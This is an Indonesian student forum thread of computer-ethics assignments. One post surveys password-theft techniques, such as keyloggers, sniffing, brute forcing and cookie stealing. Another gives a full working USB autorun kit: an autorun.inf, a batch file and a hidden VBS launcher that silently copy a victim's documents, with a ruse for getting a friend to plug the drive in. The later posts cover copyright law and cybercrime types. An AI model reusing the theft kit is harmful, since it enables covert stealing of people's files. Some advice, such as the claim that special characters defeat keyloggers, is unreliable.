Tugas Kampus untuk DosenKu Mr. Muhamad Danuri, M.Kom


You are not connected. Please login or register

Tugas I - the ten comandement of computer Ethics

Go down  Message [Halaman 1 dari 1]

admin

avatar
Admin
Tugas I - the ten comandement of computer Ethics

dikumpul disini...........

Lihat profil user http://tugasku.netgoo.org

2 Tugas 1 (ETIKA BISNIS & PROFESI) on Tue Apr 03, 2012 8:55 am


Contoh Menggunakan Komputer Untuk Mengintip File Orang Lain
Laughing M.NASYIHUN AMIN Laughing
10010874


MENGINTIP PASSWORD ORANG
KLIK DISINI...!!! lol! :

Cara-Cara Hacker Membongkar Password Sebaiknya anda membaca artikel cara-cara hacker membongkar password anda berikut ini agar anda lebih hati-hati dan tahu cara melindungi asset berharga anda di Internet

Ada banyak cara untuk mendapatkan suatu password. Beberapa diantaranya tidak membutuhkan keahlian khusus. Berikut adalah cara-cara yang paling umum dan paling sering digunakan : …..
[1]. Social Engineering
[2]. KeyLogger
[3]. Web Spoofing
[4]. Menghadang Email
[5]. Password Cracking
[6]. Session Hijacking
[7]. Menjadi Proxy Server
[8]. Memanfaatkan Kelalaian User Dalam Penggunaan FiturBrowser
[9]. Googling


[1]. Social Engineering
Social Engineering adalah nama suatu tehnik pengumpulan informasi dengan memanfaatkan celah psikologi korban. Atau mungkin boleh juga dikatakan sebagai 'penipuan' Sosial Engineering membutuhkan kesabaran dan kehati-hatian agar sang korban tidak curiga. Kita dituntut untuk kreatif dan mampu berpikiran seperti sang korban.


Social Engineering merupakan seni 'memaksa' orang lain untuk melakukan sesuatu sesuai dengan harapan atau keinginan anda. Tentu saja 'pemaksaan' yang dilakukan tidak secara terang-terangan atau diluar tingkah laku normal yang biasa dilakukan sang korban. Manusia cenderung untuk percaya atau mudah terpengaruh terhadap orang yang memiliki nama besar, pernah (atau sedang berusaha) memberikan pertolongan, dan memiliki kata-kata atau penampilan yang meyakinkan. Hal ini sering dimanfaatkan pelaku social engineering untuk menjerat korbannya. Seringkali sang pelaku membuat suatu kondisi agar kita memiliki semacam ketergantungan kepadanya.Ya, tanpa kita sadari dia mengkondisikan kita dalam suatu masalah dan membuat ( seolah – olah hanya ) dialah yang bisa mengatasi masalah itu. Dengan demikian,tentu kita akan cenderung untuk menuruti apa yang dia instruksikan tanpa merasa curiga.


Sosial Engineering adakalanya menjadi ancaman serius. Memang sepertinya tidak ada kaitan dengan teknologi, namun sosial engineering tetap layak diwaspadai karena bisa berakibat fatal bagi sistem anda. Why?? Karena bagaimanapun juga suatu komputer tetap saja tidak bisa lepas dari manusia. Ya, tidak ada satu sistem komputerpun di muka bumi ini yang bisa lepas dari campur tangan manusia. sehebat apapun pertahanan anda, jika anda sudah dikuasai oleh attacker melalui social engineering, maka bisa jadi anda sendirilah yang membukakan jalan masuk bagi sang attacker.


[2]. KeyLogger
KeyLogger adalah software yang dapat merekam aktivitas user. Hasil rekaman itu biasa disimpan berupa teks atau gambar. KeyLogger bekerja berdasarkan ketukan keyboard user. Aplikasi ini mampu mengenali form-form sensitif seperti form password misalnya.


Ada cara aman untuk menghindari keyloger:

1. Gunakan password dengan karakter special seperti !@#$%^&*(){}[]. Kebanyakan keyloger akan mengabaikan karakter ini sehingga sang pelaku (pemasang keyloger) tidak akan mendapatkan password anda yang sebenarnya.


2. Persiapkan password dari rumah, simpan dalam bentuk teks. Saat ingin memasukkan password, tingal copy-paste ajah. Keyloger akan membaca password anda berdasarkan ketukan keyboard. Namun cara ini agak beresiko. Mengapa? karena saat anda melakukan copy, data anda akan tersimpan di clipboard. Saat ini banyak dijumpai software-software gratis yang bisa menampilkan data dalam clipboard.


[3]. Web Spoofing
Masih ingat kasus pecurian Account sejumlah nasabah Bank BCA? Ya, itulah salah satu contoh nyata dari Web spoofing. Inti dari tehnik ini ialah dengan memanfaatkan kesalahan user saat mengetikkan alamat situs pada address bar. Pada dasarnya, Web Spoofing adalah usaha untuk menipu korban agar mengira dia sedang mengakses suatu situs tertentu, padahal bukan.


Pada kasus bank BCA, pelaku membuat situs yang sangat mirip dan identik dengan situs aslinya sehingga sang korban yang terkecoh tidak akan merasa ragu mengisikan informasi sensitif seperti user name dan Passwordnya. Padahal, karena situs tersebut adalah situs tipuan, maka semua informasi berharga tadi terekam oleh webserver palsu, yaitu milik sang pelaku.


[4]. Menghadang Email
Menghadang email? Ya, dan sangat mudah untuk melakukan hal ini. Salah satu cara adalah dengan menggunakan mailsnarf yang terdapat pada utility dsniff. Cara kerja Mailsnarf adalah dengan menghadang paket data yang lewat di Internet dan menyusunnya menjadi suatu email utuh.


Dsniff dan mailsnift merupakan software bekerja atas dasar WinPcap (setara dengan libcap pada Linux) yaitu suatu library yang menangkap paket-paket data. Paket-paket yang ditangkap ini akan disimpan dalam bentuk file oleh Windump, sedangkan Dsniff dan MailSnarf bertindak lebih jauh lagi yaitu menganalisa paket-paket data ini dan menampilkan password (dsniff) atau isi email (mailsnarf).


[5]. Password Cracking
'Hacking while sleeping.' itulah ungkapan yang biasa dipakai oleh orang-orang yang melakukan password cracking. Mengapa? Karena pada umumnya dibuthkan waktu yang lama untuk melakukan pasword cracking. Bisa berjam-jam, bahkan berhari – hari! Semua itu tergantung dari target, apakah sang target menggunakan password yang umum, password memiliki panjang karakter yang tidak biasa, atau password memiliki kombinasi dengan karakter-karakter special.


Salah satu software yang biasa digunakan untuk melakukan hal ini ialah dengan mengunakan Brutus, salah satu jenis software remote password cracker yang cukup terkenal. Brutus bekerja dengan teknik dictionary attack atau bruce-force attack terhadap port-port http, POP3,ftp, telnet, dan NetBIOS.


Dictionary Attack bekerja dengan mencobakan kata-kata yang ada dalam kamus password. Sedangkan brute – force attack bekerja dengan mencobakan semua kombinasi huruf, angka, atau karakter.


Brute Force Atack bekerja sangat lambat dan membutuhkan waktu yang lama tergantung dari jenis spesifikasi komputernya dan panjang karakter passwordnya. Saat ini telah banyak situs yang menutup akses terhadap akses terhadap usaha login yang secara terus-menerus tidak berhasil.


[6]. Session Hjacking
Session hijacking dewasa ini semakin marak dikalangan para attacker. Session Hijacking biasa dilakukan dengan melakukan peniruan cookies. Jadi pada intinya, kita harus bisa meniru cookies sang korban untuk mendapatkan sesi loginnya.


Lalu bagaimana cara mendapatkan cookies sang korban?


1. Dengan analisa Cookies.
Cara ini relatif sulit dilakukan.
2. Mencuri Cokies.
Misalnya Sang Attacker ingin mendapatkan account si A. Sang Attacker bisa dengan mudah membuat semacam script Java Script yang disisipkan dalam email untuk dikirim ke korban.Saat korban membuka email itu, tanpa sadar cookiesnya akan dicuri dan direkam ke suatu webserver dengan memanfaatkan suatu script PHP.


Belakangan ini yang paling sering menjadi incaran adalah account Friendster. Ada yang menyisipkan suatu scipt lewat testimonial, ada yang menyisipkannya di profilnya sendiri untuk mencuri cookies sang korban dan lain sebagainya. Saya memiliki tips untuk ini:


1. Jangan menggunakan browser Internet Explorer

Saat ingin membuka profil orang lain, jangan menggunakan Internet Explorer. Catat alamat profil yang ingi anda lihat,logout terlebih dahulu dari account anda dan bersihkan semua cookies, baru kemudian bukalah profil Friendster tujuan.


2. Periksa Source CODEnya
Ketika menerima testimonial, periksa terlebih dahulu source codenya. Apakah disana terdapat script asing atau kata-kata yang identik dengan pembajakan seperti :



'HACKED', 'DEFACED', 'OWNED'.. dll..
Jika ragu-ragu……. reject ajah..


3. LogOUT tiba-tiba.
Waspada ketika tanpa suatu alasan yang jelas tiba-tiba anda logout dengan sendirinya dari account anda. Saat anda diminta memasukkan username dan password, lihat dulu addressbar anda! apakan anda sedang berada di situs yang semestinya atau tidak. Periksa source code halaman tersebut.Lihat pada form action, kemana informasi anda nantinya akan dikirim.


Sebenarnya session hijacking bisa dicegah jika saja sang penyedia layanan memperhatikan hal-hal berikut:

1. Menetapkan session identifier yang unik
2. Menetapkan sistem identifier berpola acak
3. Session identifier yang independen
4. Session identifier yang bisa dipetakan dengan koneksi
client side.
Fenomena lain adalah, hingga saat artikel ini diterbitkan, ternyata masih banyak dijumpai para user yang tidak melakukan sign out setelah membuka accountnya. Dengan demikian, orang lain yang mengunakan komputer itu dan membuka website yang sama dengan yang telah dibuka oleh orang pertama akan otomatis login ke account sang korban.


[7]. Menjadi Proxy Server
Kita bisa mengumpulkan informasi dengan menjadi proxy server bagi korban untuk dapat berselancar. Dengan menjadi proxy server, seluruh identitas sang peselancar bisa menjadi milik kita.


[8]. Memanfaatkan Kelalaian user dalam penggunaan fiturbrowser

Setiap browser tentunya memiliki fitur yang ditujukan untuk kemudahan dan kenyamanan penggunanya dalam berselancar. Diantaranya ialah dengan adanya cache dan Password Manager.


Di Internet tentunya banyak suatu website yang isinya tidak berubah dalam beberapa hari (Contohnya spyrozone.tk nich.. hehehe Nah, untuk situs yang seperti ini cache menjadi hal yang sangat berguna. Cache akan menyimpan file-file hasil browsing sehinga nantinya jika anda berkunjung lagi ke situs tersebut browser tidak perlu lagi melakukan download untuk kedua kalinya dari server sehingga setiap halaman situs yang telah anda buka sebelumnya akan terbuka dengan lebih cepat. Semua itu biasanya diatur oleh header time to live.


Lho, bagaimana dengan situs-situs penyedia berita yang selalu up to date? Untuk site yang seperti itu, time to live-nya akan di set=0 sehinga nantinya anda akan terus melakukan download setiap kali berkunjung.


Cukup nyaman bukan? Ya, tapi ancaman mulai timbul. Cobalah kini anda jelajahi opsi-opsi yang berkaitan dengan cache pada browser anda. Tentu anda bisa menemui bahwa ada fasilitas untuk menentukan berapa besarnya file temporary yang bisa disimpan di harddisk. Cari juga lokasi dimana file-file tersebut akan disimpan.


Coba anda buka folder tersebut, anda akan menemui file-file html & file-file gambar dari site-site yang sudah anda kunjungi. Pada Browser IE, anda bisa melihat lokasi file cache dengan menjelajahi menu Tools — Internet options — Settings


Lalu apa yang bisa didapatkan?? toh cuma file-file 'sampah'?? Hmm… sekarang coba anda copy semua file yang ada di sana ke suatu folder. Lalu bukalah salah-satu file htmlnya. Jika itu komputer publik,anda bisa mengetahui situs apa saja yang telah diakses oleh oleh orang sebelum anda.


Hmm.. hanya dengan melihat file temporary anda bahkan bisa melihat password dan dll. Banyak saya temui situs yang menyimpan password dan menampilkannya pada url. Tentunya anda juga pasti sering membacanya di berbagai tutorial.


Kebanyakan browser pada saat ini memiliki fasilitas untuk menyimpan password. Misalnya saat meggunakan Mozilla Firefox, anda pasti sering menerima kotak dialog konfirmasi yang menanyakan apakah anda ingin password anda disimpan atau tidak oleh PasswordManager. Kebanyakan user cenderung untuk memilih opsi YES, entah itu dengan penuh kesadaran atau memang mereka tidak tau ( baca: tidak mau tau) apa maksud dari kotak dialog itu.


Orang lain yang kemudian mengunakan browser itu bisa dengan sangat mudah mendapatkan password korban dengan memasuki menu Tools — Options — Security – Saved password.


Contoh lain adalah fasilitas wand password yang dimiliki oleh browser Opera. Saat anda memasukkan user name dan password pada suatu form dan menekan tombol submit, opera secara default akan meminta konfirmasi kepada anda apakah anda ingin browser menyimpan id dan password anda atau tidak. Lagi dan lagi… kebanyakan netter ceroboh, mereka cenderung untuk memilih opsi 'YES'.


Lalu?? Orang lain yang kemudian menggunakan browser itu bisa melihat situs apa saja yang telah diakses oleh user, arahkan browser ke situs tersebut, letakkan cursor pada form isian user name, tekan [ALT] [ENTER] dan BOOOMM!!!! Kenapa?? Jangan kaget dulu!! Hehehe.. form login akan otomatis terisi dengan user name korban lengkap dengan passwordnya (It's fun enough..


Ini hanya sebagian kecil contoh, jelajahi fitur-firtur browser lain!


[9]. Googling
Google.com. Banyak sudah situs yang runtuh, password dan nomor – nomor kartu kredit yang dicuri akibat dari ulah orang yang menyalahgunaan kesaktiannya Dahulu, hal ini mudah dilakukan.Hanya dengan mengetikkan kata kunci tertentu yang berkaitan dengan user name dan password, anda bisa memanen ratusan password user melalui google. Tapi sekarang tampaknya anda harus gigit jari jika menggunakan cara diatas


Jangan sedih dulu karena Google baru saja menelurkan produk barunya, yaitu Google Code Search. Ancaman baru mulai timbul, 'si pintar' ini kini dapat meng-crawl hingga kepada archive file yang berada di public directory web server. Hati-hati yang punya kebiasaan untuk menyimpan informasi penting di dalamnya (password, dan info berharga lainnya) Sebaiknya mulai sekarang kebiasaan itu dihilangkan. Selalu proteksi folder-folder yang sensitif agar situs anda bisa hidup lebih lama. Kalo nggak… yach.. tunggu ajah ada orang yang memanfaatkan produk baru google ini untuk mengeruk informasi sensitif dari web server anda. dan jika itu sudah terjadi… maka bersiaplah.. 'taman bermain' anda akan diambil alih olehnya..


Hati-hatilah !


Sumber :: hotfo.blogspot.com/2011/04/triks-mengintip-password-orang.html



Terakhir diubah oleh Nazyihun tanggal Tue Apr 03, 2012 9:09 am, total 1 kali diubah

Lihat profil user http://www.nazyihun-adhitya.blogspot.com

3 Tugas 1 on Sat Apr 07, 2012 11:40 am

Contoh Menggunakan Komputer Untuk Mencuri
Nama : Diar Siswi Anggraeni
NIM : 10010858


Cara mencuri file dari komputer teman

bounce ..KLIK DISINI.. lol! :

Ok, bayangkan anda sedang menghadapi ujian terakhir, dan anda belum siap, tetapi teman anda punya jawaban atau catatan penting di laptop atau di komputernya tapi tidak mau berbagi dengan anda, dan teman anda ini sedikit goblok, dan anda kepengen mencuri isi dokumen yang berada dikomputernya.

Cara mencuri data di komputernya adalah dengan pergi kerumahnya dimalam hari dengan membawa flashdisk yang digantung dileher anda, dan sembunyi2 masuk ke kamarnya dan mengcopy isi dokumen di harddisknya, jadi pencuri beneran nih? hehehehe. atau alternatif lain, kita kan temanan yah ceritanya, jadi bilang ajah gini ama dia, “Teman, aku punya lagu baru ini di flashdisk gue? mau copy ngga?” nah lalu kita copykan lagu nya ke komputer dia. (sssssttt diam2 yah!)

Kayaknya cara pertama diatas dengan menjadi pencuri beneran ngga enak yah? hehehe. langsung ajah kita pake cara halus. ikuti langkah2 berikut:

Sebelumnya siapin dolo flashdisk kita (kalo bisa isinya gede)
Langkah ke-1

Buka Notepad (saya sarankan pake program Notepad++) copy dan paste kode dibawah ini.

[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat

Kemudian simpanlah di flashdisk dengan nama: autorun.inf
Langkah ke-2

Buka Notepad lagi dan copas kode berikut:

@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\My Documents\*.doc" "%drive%\all\doc"
@echo off
cls


Simpan di flashdisk anda dengan nama:file.bat
Langkah ke-3

Buka Notepad lagi dan copas kode berikut:

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False


Simpan di flashdisk anda dengan nama:invisible.vbs
Langkah ke-4

Buka Notepad lagi dan copas lagi kode berikut:

wscript.exe \invisible.vbs file.bat

Simpan di flashdisk anda dengan nama:launch.bat

Ok, sekarang pastikan ke-4 file tadi yang telah kita buat berada di flashdisk kita, dan buatlah folder baru dengan nama all untuk menyimpan hasil curian kita di komputer teman tadi, dimana perintah: %backupcmd% “%USERPROFILE%\My Documents\*.doc” “%drive%\all\doc”, akan menyalin semua file ber-ekstensi .doc kedalam folder “all/doc” yang berada di flashdisk kita secara otomatis waktu kita mencolokkan flashdisk kita dikomputernya, ataupun dia sendiri yang mencolokkannya dikomputernya sendiri.

Sebelum mencoba mencuri file dikomputer teman, coba dulu flashdisk kita dikomputer kita sendiri, lihat apakah bekerja dengan baik. Selamat mencoba


Sumber :: hong.web.id/tutorial/cara-mencuri-file-dari-komputer-teman

Lihat profil user

4 Tugas 1 on Sun Apr 08, 2012 3:04 pm

Etika Dan Moral Penggunaan teknologi Informasi Dan Komunikasi
Dalam penggunaan perangkat teknologi/ teknologi informasi saat ini, terutama computer, tidak hanya kemampuan dalam menjalankan program-program computer atau bisa mengutak-atik seluruh system dalam computer, kita juga harus memiliki sikap (etika dan moral). Apalagi kaitan dalam dunia internet yang sekarang sudah semakin “mendunia”. Sebab semua hal dalam internet baik itu gambar, musik, file-file berita atau informasi, kesemuanya itu baik langsung atau pun tidak langsung merupakan hasil karya cipta (kekayaan intelektual) dari seseorang, sekelmpok orang, maupun lembaga yang dilindungi oleh Undang-Undang.


Beberapa Hal yang menyangkut dalam Etika dan moral dalam penggunaan teknologi informasi dan komunikasi :

1. Menghargai Hasil Karya Orang Lain
Beberapa perbuatan yang dapat mencerminkan penghargaan kita terhadap hasil karya orang lain:

Selalu menggunakan perangkat lunak yang asli, resmi, dan berlisensi dari perusahaan yang mengeluarkan perangkat lunak tersebut.
Menghindari penggunaan perangkat lunak bajakan yang tidak bisa dipertanggungjawabkan kualitas dan keasliaannya.
Tidak turut serta dalam tindakan membajak, menyalin, mengkopi, maupun menggandakan perangkat lunak atau program computer tanpa seizin dari perusahaan yang menerbitkan perangkat tersebut.
Menghindari penyalahgunaan perangkat lunak dalam bentuk apapun yang bersifat negative dan merugikan orang lain.
Tidak melakukan tindakan pengubahan, pengurangan, maupun penambahan hasil ciptaan suatu perangkat lunak.
2. Hak Cipta Perangkat Lunak
Menurut Pasal 12 Ayat (1) Undang-Undang Hak Cipta No.19 Tahun 2002, Ciptaan yang dilindungi adalah ciptaan dalam bidang ilmu pengetahuan, seni, dan sastra, yang mencangkup:

Buku, program computer, pamflet, lay out karya tulis yang diterbitkan, dan semua hasil karya tulis lain;

Ceramah, kuliah, pidato, dan Ciptaan lain yang sejenis dengan itu;Alat peraga yang dibuat untuk kepentingan pendidikan dan ilmu pengetahuan;
Lagu atau musik dengan atau tanpa teks;
Dram atau drama musical, tari, koreograffi, pewayangan, dan pantomim;
Seni rupa dalam segala bentuk seperti seni lukis, gambar, ukir, kaligrafi, pahat, patung, kolase, terapan;
Arsitektur;
Peta;
Seni batik;
Fotografi;
Sinematografi;
Terjemahan, tafsir, saduran, bunga rampai, database, dan karya lain dari hasil pengalihwujudan;

Sedangkan untuk ciptaan yang tidak memiliki atau tidak ada Hak Cipta seperti yang dinyatakan dalam pasal 13 Undang-Undang Hak Cipta No.19 tahun 2002 adalah:

a. Hasil rapat terbuka kembaga-lembaga Negara;
b. Peraturan perundang-undangan;
c. Pidato kenegaraan atau pidato pejabat pemerintah;
d. Putusan pengadilan atau penetapan hakim; atau
e. Keputusan badan arbitrase atau keputusan badan-badan sejenis lainnya.

Undang-undang Hak Cipta yang belaku saat ini adalah Undang-Undang Hak Cipta No.19 tahun 2002 yang merupakan penyempurnaan dari Undang-Undang Hak Cipta No.6 tahun 1982, Undang-Undang Hak Cipta No.7 Tahun 1987, dan Undang-Undang Hak Cipta No.12 tahun 1997.

Menurut Pasal 2 Ayat (2) Hak Cipta No.19 tahun 2002, Pencipta atau Pemegang Hak Cipta atas karya sinematografi dan Program Komputer memiliki hak untuk memberikan izin atau melarang orang lain yang tanpa persetujuannya menyewakan Ciptaan tersebut untuk kepentingan yang bersifat komersil.

3. Tata Cara Mengutip/Mengkopi Hasil Karya Orang Lain
Ada beberapa ketentuan yang perlu diperhatikan dalam mengutip maupun mengkopi hasil karya cipta orang lain, termasuk tulisan ini pun sesungguhnya tidak murni hasil karya saya, jadi saya pun juga berhati-hati dalam mengutip isi dari artikel sesungguhnya. Hal-hal tersebut antara lain sebagau berikut:

Pasal 14 UU Hak Cipta No.19 tah 2002 menyatakan bahwa :
“Tidak dianggap sebagai pelanggaran Hak Cipta:

Pengumuman dan/atau Perbanyakan lambang Negara dan lagu kebangsaan menurut sifatnya yang asli;
Pengumuman dan/atau diperbanyak oleh atau atas nama Pemerintah, kecuali apabila Hak Cipta itu dinyatakan dilindungi, baik dengan peraturan perundang-undangan maupun dengan pernyataan pada Ciptaan itu sendiri atau ketika Ciptaan itu diumumkan dan/atau diperbanyak; atau
Pengambilan berita actual baik seluruhnya maupun sebagian dari kantor berita, Lembaga Penyiaran, dan surat kabar atau sumber sejenis lain, dengan ketentuan sumbernya harus disebutkan secara lengkap.”

Pasal 15 UU Hak Cipta No.19 tahun 2002 menyatakan bahwa:

Dengan syarat bahwa sumbernya harus disebutkan atau dicantumkan, tidak dianggap sebagai pelanggaran Hak Cipta :


Penggunaan Hak Ciptaan pihak lain untuk kepentingan pendidikan, penelitian, penulisan karya ilmiah, penyusunan laporan, penulisan kritik atau tinjauan suatu masalah dengan tidak merugikan kepentingan yang wajar dari Pencipta;
Pengambilan Ciptaan pihak lain, baik seluruhnya maupun sebagian, guna keperluan pembelaan di dalam atau di luar Pengadilan;
Pengambilan Ciptaan pihak lain, baik seluruhnya maupun sebagian, guna keperluan:
(i) Ceramah yang semata-mata untuk tujuan pendidikan dan ilmu pengetahuan, atau
(ii) Pertunjukan atau pementasan yang tidak dipungut bayaran dengan ketentuan tidak merugikan kepentingan yang wajar dari Pencipta;
Perbanyakan suatu Ciptaan bidang ilmu pengetahuan, seni dan sastra dalam huruf braile guna keperluan para tunanetra, kecuali jika Perbanyakan itu bersifat komersial;
Perbanyakn suatu Ciptaan selain Progam Komputer secara terbatas dengan cara atau alat apapun atau suatu proses yang serupa oleh perpustakaan umum, lembaga ilmu pengetahuan atau pendidikan, dan pusat dokumentasi yang nonkomersial semata-mata untuk keperluan aktivitasnya;
Perubahan yang dilakukan berdasarkan pertimbangan pelaksanaan teknis atas karya arsitektur, seperti Ciptaan bangunan;
Pembuatan salinan cadangan suatu Progam Komputer oleh Pemilik Progam Komputer yang dilakukan semata-mata untuk digunakan sendiri;

Berdasarkan ketentuan-ketentuan diatas maka tata cara mengutip atau mengkopi hasil karya orang lain antara lain sebagai berikut:


Setiap pemgambilan atau pengutipan Ciptaan pihak lain sebagian maupunn seluruhnya harus mencantumkan sumbernya jika tujuan pengambilan tersebut untuk keperluan seperti yang disebutkan pada Pasal 15 UU Hak Cipta No.19 tahun 2002 diatas. Namun jika tujuannya untuk keperluan diluar yang ditentukan oleh pasal tersebut seperti komersialisasi atau mencari keuntungan, maka kita perlu mendapatkan persetujuan dari Pemegang Hak Cipta dengan ketentuan yang sudah diatur oleh undang-undang.
Pemilik suatu Progam Komputer (bukan Pemegang Hak Cipta Progam Komputer ) dibolehkan membuat salinan Progam Komputer yang dimilikinya tersebut untuk dijadikan cadangan, jika digunakan untuk keperluan sendiri, bukan untuk komersialisasi atau mencari keuntungan. Hal ini sudah ditetapkan dalam Pasal 15 UU Hak Cipta No.19 tahun 2002 huruf g.


4. Sanksi Pelanggaran Undang-Undang Hak Cipta
Pelanggaran terhadap UU Hak Cipta Progam Komputer akan dikenai sanksi atau hukuman. Hal ini sudah ditetapkan dalam pasal 27 ayat (3) UU Hak Cipta No. 19 Tahun 2002 yang berbunyi :

“barang siapa yang dengan sengaja dan tanpa hak memperbanyak penggunaan untuk kepentingan komersial duatu progam computer dipidana dengan pidana penjara paling lama 5 tahun dan / atau denda paling banyak Rp500.000,-”



sumber:
PUSTAKA(diambil dari):
Drs. Supriyono.2005.Teknologi Informasi dan Komunikasi.Jakarta:Yudhistira

Lihat profil user

5 tugas 1 on Sun Apr 08, 2012 4:31 pm

ani hidayah Smile
10010850
"contoh komputer di gunakan untuk mencuri"
lol!

MODUS- MODUS KEJAHATAN DALAM KOMPUTER
Seiring dengan perkembangan teknologi Internet, serta semakin banyaknya pengguna internet semakin meningkat pula potensi kejahatan dalam internet yang disebut dengan "CyberCrime" atau kejahatan melalui jaringan Internet, Munculnya beberapa kasus "CyberCrime" di Indonesia, seperti pencurian kartu kredit, hacking beberapa situs, menyadap transmisi data orang lain, misalnya email, dan memanipulasi data dengan cara menyiapkan perintah yang tidak dikehendaki ke dalam programmer komputer. Sehingga dalam kejahatan komputer dimungkinkan adanya delik formil dan delik materil. Delik formil adalah perbuatan seseorang yang memasuki komputer orang lain tanpa ijin, sedangkan delik materil adalah perbuatan yang menimbulkan akibat kerugian bagi orang lain. Adanya CyberCrime telah menjadi ancaman stabilitas, sehingga pemerintah sulit mengimbangi teknik kejahatan yang dilakukan dengan teknologi komputer, khususnya jaringan internet dan intranet..

cybercrime merupakan perbuatan melawan hukum yang dilakukan dengan menggunakan internet yang berbasis pada kecanggihan teknologi komputer dan telekomunikasi.

Karakteristik Cybercrime
Selama ini dalam kejahatan konvensional, dikenal adanya dua jenis kejahatan sebagai berikut:
a. Kejahatan kerah biru (blue collar crime)
jenis kejahatan atau tindak kriminal yang dilakukan secara konvensional seperti misalnya perampokkan, pencurian, pembunuhan dan lain-lain.
b. Kejahatan kerah putih (white collar crime)
Kejahatan jenis ini memiliki empat kelompok kejahatan, yakni kejahatan korporasi, kejahatan birokrat, malpraktek, dan kejahatan individu.

Karakteristik unik dari kejahatan di dunia maya antara lain menyangkut lima hal berikut:
1. Ruang lingkup kejahatan
2. Sifat kejahatan
3. Pelaku kejahatan
4. Modus Kejahatan
5. Jenis kerugian yang ditimbulkan

Jenis Cybercrime
Berdasarkan jenis aktifitas yang dilakukannya, cybercrime dapat digolongkan menjadi beberapa jenis sebagai berikut:
a. Unauthorized Access
kejahatan yang terjadi ketika seseorang memasuki atau menyusup ke dalam suatu sistem jaringan komputer secara tidak sah, tanpa izin, atau tanpa sepengetahuan dari pemilik sistem jaringan komputer yang dimasukinya. Probing dan port merupakan contoh kejahatan ini.
b. Illegal Contents
kejahatan yang dilakukan dengan memasukkan data atau informasi ke internet tentang suatu hal yang tidak benar, tidak etis, dan dapat dianggap melanggar hukum atau menggangu ketertiban umum, contohnya adalah penyebaran pornografi.
c. Penyebaran virus secara sengaja
Penyebaran virus pada umumnya dilakukan dengan menggunakan email. Sering kali orang yang sistem emailnya terkena virus tidak menyadari hal ini. Virus ini kemudian dikirimkan ke tempat lain melalui emailnya.
d. Data Forgery
Kejahatan yang dilakukan dengan tujuan memalsukan data pada dokumen-dokumen penting yang ada di internet. Dokumen-dokumen ini biasanya dimiliki oleh institusi atau lembaga yang memiliki situs berbasis web database.
e. Cyber Espionage, Sabotage, and Extortion
Cyber Espionage merupakan kejahatan yang memanfaatkan jaringan internet untuk melakukan kegiatan mata-mata terhadap pihak lain, dengan memasuki sistem jaringan komputer pihak sasaran.
f. Cyberstalking
Kejahatan jenis ini dilakukan untuk mengganggu atau melecehkan seseorang dengan memanfaatkan komputer.
g. Carding
Carding merupakan kejahatan yang dilakukan untuk mencuri nomor kartu kredit milik orang lain dan digunakan dalam transaksi perdagangan di internet.
h. Hacking dan Cracker
Istilah hacker biasanya mengacu pada seseorang yang punya minat besar untuk mempelajari sistem komputer secara detail dan bagaimana meningkatkan kapabilitasnya. Adapun mereka yang sering melakukan aksi-aksi perusakan di internet lazimnya disebut cracker. Boleh dibilang cracker ini sebenarnya adalah hacker yang yang memanfaatkan kemampuannya untuk hal-hal yang negatif.
i. Cybersquatting and Typosquatting
Cybersquatting merupakan kejahatan yang dilakukan dengan mendaftarkan domain nama perusahaan orang lain dan kemudian berusaha menjualnya kepada perusahaan tersebut dengan harga yang lebih mahal.
j. Hijacking
Hijacking merupakan kejahatan melakukan pembajakan hasil karya orang lain.
k. Cyber Terorism
Suatu tindakan cybercrime termasuk cyber terorism jika mengancam pemerintah atau warganegara, termasuk cracking ke situs pemerintah atau militer. Beberapa contoh kasus Cyber Terorism sebagai berikut :
• Ramzi Yousef, dalang penyerangan pertama ke gedung WTC, diketahui menyimpan detail serangan dalam file yang di enkripsi di laptopnya.
• Osama Bin Laden diketahui menggunakan steganography untuk komunikasi jaringannya.
• Suatu website yang dinamai Club Hacker Muslim diketahui menuliskan daftar tip untuk melakukan hacking ke Pentagon.
• Seorang hacker yang menyebut dirinya sebagai DoktorNuker diketahui telah kurang lebih lima tahun melakukan defacing atau mengubah isi halaman web dengan propaganda anti-American, anti-Israel dan pro-Bin Laden.

Berdasarkan Motif Kegiatan
Berdasarkan motif kegiatan yang dilakukannya, cybercrime dapat digolongkan menjadi dua jenis sebagai berikut :
a. Cybercrime sebagai tindakan murni kriminal
b. Cybercrime sebagai kejahatan ”abu-abu”

Berdasarkan Sasaran Kejahatan
Sedangkan berdasarkan sasaran kejahatan, cybercrime dapat dikelompokkan menjadi beberapa kategori seperti berikut ini :

a. Cybercrime yang menyerang individu (Against Person)
Beberapa contoh kejahatan ini antara lain :
• Pornografi
Kegiatan yang dilakukan dengan membuat, memasang, mendistribusikan, dan menyebarkan material yang berbau pornografi, cabul, serta mengekspos hal-hal yang tidak pantas.
• Cyberstalking
Kegiatan yang dilakukan untuk mengganggu atau melecehkan seseorang dengan memanfaatkan komputer, misalnya dengan menggunakan e-mail yang dilakukan secara berulang-ulang seperti halnya teror di dunia cyber. Gangguan tersebut bisa saja berbau seksual, religius, dan lain sebagainya.
• Cyber-Tresspass
Kegiatan yang dilakukan melanggar area privasi orang lain seperti misalnya Web Hacking. Breaking ke PC, Probing, Port Scanning dan lain sebagainya.

b. Cybercrime menyerang hak milik (Againts Property)

c. Cybercrime menyerang pemerintah (Againts Government)

Penanggulangan Cybercrime
Aktivitas pokok dari cybercrime adalah penyerangan terhadap content, computer system dan communication system milik orang lain atau umum di dalam cyberspace. Fenomena cybercrime memang harus diwaspadai karena kejahatan ini agak berbeda dengan kejahatan lain pada umumnya. Cybercrime dapat dilakukan tanpa mengenal batas teritorial dan tidak memerlukan interaksi langsung antara pelaku dengan korban kejahatan. Berikut ini cara penanggulangannya :
a. Mengamankan sistem
b. Penanggulangan Global

beberapa langkah penting yang harus dilakukan setiap negara dalam penanggulangan cybercrime adalah :
1. melakukan modernisasi hukum pidana nasional beserta hukum acaranya.
2. meningkatkan sistem pengamanan jaringan komputer nasional sesuai standar internasional.
3. meningkatkan pemahaman serta keahlian aparatur penegak hukum mengenai upaya pencegahan, investigasi dan penuntutan perkara-perkara yang berhubungan dengan cybercrime.
4. meningkatkan kesadaran warga negara mengenai masalah cybercrime serta pentingnya mencegah kejahatan tersebut terjadi.
5. meningkatkan kerjasama antarnegara, baik bilateral, regional maupun multilateral, dalam upaya penanganan cybercrime.

Sumber :
